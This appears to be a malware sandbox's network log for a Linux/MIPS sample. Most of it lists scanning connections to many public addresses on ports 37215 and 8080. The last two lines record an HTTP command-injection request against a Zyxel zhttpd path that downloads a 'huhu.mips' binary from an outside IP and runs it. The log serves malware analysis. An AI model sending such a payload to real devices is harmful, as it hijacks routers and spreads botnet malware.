            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.220.126.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.110.102.99:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.203.154.13:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.220.234.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 185.157.9.194:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 62.122.204.151:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 170.246.212.93:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.6.101.51:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.54.26.24:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 83.103.37.229:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.218.111.80:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.192.59.158:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.35.32.190:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.17.108.22:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 180.111.170.147:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.225.104.45:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.34.248.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.24.148.221:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.117.9.37:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.59.254.234:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.232.82.137:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.31.29.11:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 122.223.177.65:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.168.121.5:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.88.208.189:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.143.170.169:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.163.183.182:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.215.142.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.193.48.29:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 5.58.31.109:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 117.95.22.36:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.56.186.10:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 137.4.40.222:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 49.219.58.51:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.169.121.232:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.79.183.76:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.29.155.146:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.182.125.8:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.60.58.56:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.30.48.203:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 102.191.105.109:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.1.241.17:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.132.206.8:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.89.14.233:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.116.53.185:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.160.170.235:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.6.245.182:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.216.169.115:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.209.61.204:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.15.187.123:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 20.136.156.154:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.3.79.249:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 68.231.14.140:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.156.114.165:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.87.180.224:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.207.149.170:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.250.112.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 18.251.6.142:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.206.246.92:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.37.94.94:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.125.105.99:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.246.62.231:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 74.148.61.10:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 207.189.160.190:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 93.224.231.122:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 54.119.23.81:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.71.148.182:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.158.153.173:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.241.191.197:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 54.173.121.216:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.132.121.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.137.193.198:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.38.9.205:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.184.31.65:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.226.101.119:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 42.233.52.235:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.34.33.91:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 107.116.217.221:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.235.128.219:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.166.233.198:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.161.179.140:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.156.100.92:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.116.197.172:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.98.192.138:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.121.148.198:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 199.110.134.136:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.181.193.215:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.251.64.11:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 174.218.123.64:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.243.38.23:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.227.106.62:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.5.54.37:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.62.246.50:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.124.144.58:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 107.145.240.232:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.8.107.235:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 188.160.221.196:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.5.132.36:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.100.9.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.214.115.118:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.224.74.109:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.139.124.200:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 140.131.50.254:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.244.82.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.113.8.129:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.10.107.188:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.58.91.79:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.168.75.26:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 138.100.206.140:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.86.205.44:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.236.4.190:37215
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 151.185.52.221:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 54.111.118.244:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 98.7.107.223:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 17.132.255.221:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 175.235.64.162:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 221.146.203.159:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 139.32.224.158:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 222.230.239.73:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 101.58.124.40:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 44.69.15.89:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 108.109.103.26:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 76.247.250.17:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 181.142.27.237:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 113.147.195.158:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 45.23.236.221:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 101.177.67.217:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 193.33.186.0:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 193.138.116.80:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 118.78.118.239:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 83.9.37.60:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 147.24.240.90:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 37.231.11.166:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 101.53.171.64:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 99.138.132.45:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 73.245.195.162:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 49.246.225.84:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 86.84.30.194:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 124.255.156.59:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 185.22.142.105:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 70.74.223.183:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 65.64.78.73:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 76.135.245.57:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 168.118.180.169:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 37.88.35.29:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 159.210.4.167:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 164.191.163.220:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 176.248.80.143:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 131.120.31.58:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 187.209.197.131:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 142.54.242.85:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 216.172.243.49:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 101.62.159.243:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 49.241.84.177:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 134.225.12.184:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 149.61.90.22:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 57.240.187.82:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 74.65.203.73:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 173.175.43.74:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 153.162.125.127:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 101.39.215.49:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 113.31.153.175:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 203.115.65.160:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 47.195.17.229:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 170.117.237.131:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 48.116.197.82:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 31.120.196.245:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 195.181.236.157:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 123.65.157.23:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 60.53.115.245:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 104.40.168.56:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 218.64.13.197:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 137.13.168.236:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 161.213.206.215:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 171.147.246.88:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 114.215.189.74:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 162.141.72.162:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 81.122.166.155:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 96.153.200.47:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 183.195.76.212:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 115.71.183.176:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 123.116.51.155:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 158.96.158.160:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 124.189.231.76:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 197.63.110.116:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 196.221.100.205:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 69.146.51.127:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 34.7.249.214:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 213.170.21.231:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 76.168.2.208:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 32.54.43.166:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 185.189.152.154:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 177.125.46.218:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 13.24.42.190:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 73.87.237.210:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 106.127.222.18:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 118.146.69.194:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 107.134.219.129:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 34.225.90.76:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 194.50.109.141:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 128.205.103.142:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 131.55.25.148:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 161.60.124.164:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 84.178.88.80:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 201.234.194.52:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 206.216.53.95:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 112.26.86.49:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 161.154.96.168:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 107.3.236.50:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 206.138.143.209:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 129.109.102.112:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 41.9.94.21:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 51.0.199.106:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 155.116.30.102:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 116.146.188.25:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 220.162.9.110:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 167.76.17.233:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 40.115.238.4:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 8.41.153.168:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 148.36.245.115:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 54.225.53.197:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 158.65.137.5:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 91.119.114.59:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 170.238.4.112:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 193.90.147.85:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 94.133.84.187:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 189.89.180.64:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 175.21.16.34:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 78.39.167.172:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 82.85.67.126:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 188.220.127.173:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 86.243.4.145:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 102.77.100.34:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 194.148.144.123:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 60.11.77.234:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 182.228.103.9:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 93.96.233.126:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 50.48.65.60:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 40.191.149.89:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 54.183.136.207:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 2.136.242.245:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 140.127.173.51:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 49.91.183.148:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 122.212.253.76:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 35.157.208.180:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 102.115.57.224:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 115.99.170.147:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 50.42.66.155:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 69.178.3.171:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 183.136.87.207:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 199.204.64.76:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 162.174.83.133:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 154.247.254.54:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 44.17.132.194:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 198.67.184.218:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 161.236.185.111:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 159.15.248.67:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 112.48.197.91:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 136.46.79.181:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 211.29.211.162:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 48.233.215.227:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 201.47.210.212:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 8.105.7.15:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 38.207.90.217:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 181.29.143.231:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 121.161.178.54:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 25.210.192.71:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 139.249.213.233:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 165.139.62.128:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 2.204.155.245:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 201.56.70.133:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 173.57.208.62:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 190.185.163.72:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 196.83.38.188:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 8.82.209.79:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 141.67.59.229:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 129.102.80.91:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 120.54.192.67:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 124.65.161.207:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 107.249.251.207:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 170.39.233.247:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 96.188.59.172:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 183.49.146.38:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 1.178.111.189:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 198.242.18.131:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 187.48.11.151:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 152.94.221.77:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 13.7.222.230:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 19.196.15.203:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 190.175.111.154:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 147.222.7.235:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 216.247.162.121:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 18.218.113.178:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 191.39.154.31:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 183.151.204.200:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 2.57.159.77:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 130.152.135.185:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 210.193.103.106:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 92.156.215.197:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 187.75.95.73:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 107.235.244.252:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 90.10.35.205:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 165.198.49.62:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 162.113.214.9:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 101.238.169.242:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 82.98.101.30:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 218.143.177.238:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 178.8.70.63:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 195.46.104.186:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 128.109.48.2:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 129.191.187.157:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 154.174.16.171:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 113.49.206.111:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 171.118.18.105:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 210.20.176.23:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 92.21.21.169:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 34.254.96.104:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 80.215.136.37:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 154.243.212.7:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 130.66.43.219:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 167.30.175.235:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 175.224.134.3:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 142.250.155.224:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 14.101.187.146:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 203.98.121.198:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 49.13.61.74:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 169.239.237.127:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 186.119.21.226:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 45.59.154.233:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 203.133.85.248:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 89.163.167.246:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 112.169.164.196:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 114.56.45.185:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 144.118.61.36:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 14.108.155.13:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 45.84.202.67:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 111.5.69.47:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 83.146.57.87:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 189.32.172.41:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 118.161.80.234:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 13.44.27.236:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 85.196.198.244:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 195.232.218.49:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 205.189.41.200:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 27.207.240.50:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 158.105.137.62:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 137.215.18.247:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 49.228.242.0:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 112.214.199.149:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 40.159.231.197:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 197.181.18.111:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 166.95.7.0:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 70.173.76.221:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 39.61.9.141:8080
            Source: global trafficTCP traffic: 192.168.2.23:57116 -> 37.172.47.78:8080
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
